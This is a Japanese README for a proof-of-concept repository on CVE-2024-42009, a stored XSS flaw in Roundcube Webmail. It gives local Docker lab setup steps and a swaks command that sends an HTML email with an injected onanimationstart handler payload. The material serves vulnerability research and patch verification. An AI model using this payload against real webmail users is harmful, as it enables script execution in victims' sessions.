このリポジトリは、Roundcube Webmail の CVE-2024-42009(保存型クロスサイトスクリプティング(XSS)の脆弱性)に対する実証コード(PoC)を示しています。
この脆弱性は、不適切なHTMLサニタイズとその後の安全でない属性の再処理に起因し、攻撃者が細工したHTMLメールを介して悪意のあるイベントハンドラを注入することを可能にします。
Roundcube は受信したHTMLメールをサニタイズしますが、その後特定の属性(例:bgcolor、不正な形式の属性)を再処理するため、以下の問題が発生します:
onanimationstart)の再導入これにより、被害者が悪意のあるメールを開くと任意のJavaScriptが実行される可能性があります。
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
docker compose up -d
⏳ メールサーバーの初期化に約10~15秒お待ちください。
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'
http://localhost:8080
認証情報:
swaks ツールを使用して悪意のあるメールを送信します:
swaks --to [email protected] \
--from [email protected] \
--server localhost:2525 \
--header "Content-Type: text/html; charset=utf-8" \
--header "Subject: CVE-2024-42009 PoC" \
--body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'


パッチ適用済みのバージョンにアップグレード:
このプロジェクトは教育および許可されたセキュリティ研究目的のみに使用してください。 適切な許可なくシステムに対して使用しないでください。